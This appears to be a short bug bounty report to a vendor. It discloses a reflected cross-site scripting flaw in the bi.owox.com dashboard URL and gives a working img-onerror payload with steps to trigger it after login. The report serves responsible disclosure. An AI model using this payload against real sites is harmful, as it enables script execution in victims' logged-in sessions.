Hi team,
6177527534dc114eb07fa829e4ce4d28
The URL will now be: https://bi.owox.com/ui/6177527534dc114eb07fa829e4ce4d28<img src=xss onerror=prompt(‘XSS’)>/dashboard/?trial=activated
1, go to https://bi.owox.com/ui/6177527534dc114eb07fa829e4ce4d28<img src=xss onerror=prompt(‘XSS’)>/dashboard/?trial=activated
2, Log in and XSS
will execute
{F630101}
Firefox
Chrome
This vulnerability is aimed at all victims and they do not need to be involved in the Project
. Just paste this URL and login, XSS will automatically execute.
Therefore, it will have a high impact
, because before XSS is executed, the application will ask the user to login.
Impact
https://portswigger.net/web-security/cross-site-scripting/reflected
https://portswigger.net/web-security/cross-site-scripting/exploiting
Best regards,
@dat